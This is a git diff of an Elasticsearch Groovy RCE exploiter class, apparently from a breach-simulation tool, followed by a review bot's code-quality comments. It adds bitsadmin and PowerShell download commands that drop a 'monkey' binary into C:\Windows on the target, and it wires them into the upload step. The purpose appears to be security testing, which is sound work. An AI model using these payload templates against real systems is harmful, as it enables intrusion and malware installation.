Commands tested and working on windows.
This commit is contained in:
parent
7e2cc86ab9
commit
a54eedec11
|
@ -6,13 +6,14 @@
|
||||||
|
|
||||||
import json
|
import json
|
||||||
import logging
|
import logging
|
||||||
|
|
||||||
import requests
|
import requests
|
||||||
|
|
||||||
from model import DROPPER_ARG
|
|
||||||
from network.elasticfinger import ES_SERVICE, ES_PORT
|
from network.elasticfinger import ES_SERVICE, ES_PORT
|
||||||
from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth
|
from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth
|
||||||
from exploit.web_rce import WebRCE
|
from exploit.web_rce import WebRCE
|
||||||
|
from model import WGET_HTTP_UPLOAD, POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED
|
||||||
|
|
||||||
|
import copy
|
||||||
|
import re
|
||||||
|
|
||||||
__author__ = 'danielg'
|
__author__ = 'danielg'
|
||||||
|
|
||||||
|
@ -34,6 +35,10 @@ class ElasticGroovyExploiter(WebRCE):
|
||||||
|
|
||||||
DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder
|
DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder
|
||||||
|
|
||||||
|
# Both commands are prepared for use in future development
|
||||||
|
RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s'
|
||||||
|
POWERSHELL_COMMAND = r"powershell -Command \\\"Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing\\\""
|
||||||
|
|
||||||
_TARGET_OS_TYPE = ['linux', 'windows']
|
_TARGET_OS_TYPE = ['linux', 'windows']
|
||||||
|
|
||||||
def __init__(self, host):
|
def __init__(self, host):
|
||||||
|
@ -56,14 +61,22 @@ class ElasticGroovyExploiter(WebRCE):
|
||||||
if not vulnerable_urls:
|
if not vulnerable_urls:
|
||||||
return False
|
return False
|
||||||
|
|
||||||
if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], self._config):
|
# Extra escaping required:
|
||||||
|
config = copy.deepcopy(self._config)
|
||||||
|
config.dropper_target_path_win_32 = r"C:\\\\Windows\\\\monkey32.exe"
|
||||||
|
config.dropper_target_path_win_64 = r"C:\\\\Windows\\\\monkey64.exe"
|
||||||
|
|
||||||
|
if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], config):
|
||||||
LOG.info("Host %s was already infected under the current configuration, done" % self.host)
|
LOG.info("Host %s was already infected under the current configuration, done" % self.host)
|
||||||
return True
|
return True
|
||||||
|
|
||||||
if not WebRCE.set_host_arch(self.host, exploiter, vulnerable_urls[0]):
|
if not WebRCE.set_host_arch(self.host, exploiter, vulnerable_urls[0]):
|
||||||
return False
|
return False
|
||||||
|
|
||||||
data = WebRCE.upload_monkey(self.host, self._config, exploiter, vulnerable_urls[0])
|
commands = {'windows': self.RDP_CMDLINE_HTTP,
|
||||||
|
'linux': WGET_HTTP_UPLOAD}
|
||||||
|
|
||||||
|
data = WebRCE.upload_monkey(self.host, config, exploiter, vulnerable_urls[0], commands)
|
||||||
|
|
||||||
# We can't use 'if not' because response may be ''
|
# We can't use 'if not' because response may be ''
|
||||||
if data is not False and data['response'] == False:
|
if data is not False and data['response'] == False:
|
||||||
|
@ -81,7 +94,7 @@ class ElasticGroovyExploiter(WebRCE):
|
||||||
payload = self.JAVA_CMD % command
|
payload = self.JAVA_CMD % command
|
||||||
response = requests.get(url, data=payload)
|
response = requests.get(url, data=payload)
|
||||||
result = self.get_results(response)
|
result = self.get_results(response)
|
||||||
if not result: # not vulnerable
|
if not result:
|
||||||
return False
|
return False
|
||||||
return result[0]
|
return result[0]
|
||||||
|
|
||||||
|
|
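Review bot: The comment `# Both commands are prepared for use in future development` added above `RDP_CMDLINE_HTTP` is contradicted within the same commit, because the third hunk builds `commands = {'windows': self.RDP_CMDLINE_HTTP, 'linux': WGET_HTTP_UPLOAD}` and passes it to `upload_monkey`, so only `POWERSHELL_COMMAND` is actually unused; reword it to `# POWERSHELL_COMMAND is kept for future use; RDP_CMDLINE_HTTP is the current Windows download command (bitsadmin, copied from rdpgrinder)`. `import re` is added in the first hunk but none of the visible hunks reference `re`, so it appears unused unless code outside the shown hunks needs it. In the third hunk the deep-copied `config` replaces `dropper_target_path_win_32` and `dropper_target_path_win_64` with fixed values, which means the configured Windows target path is silently ignored by this exploiter; the `# Extra escaping required:` comment should state that the configured value is overridden rather than escaped and name which layer (presumably the JSON/Groovy payload built from `JAVA_CMD`) consumes the doubled backslashes, since a reader cannot tell from the constants alone. The enclosing method of the third hunk starts outside the hunk.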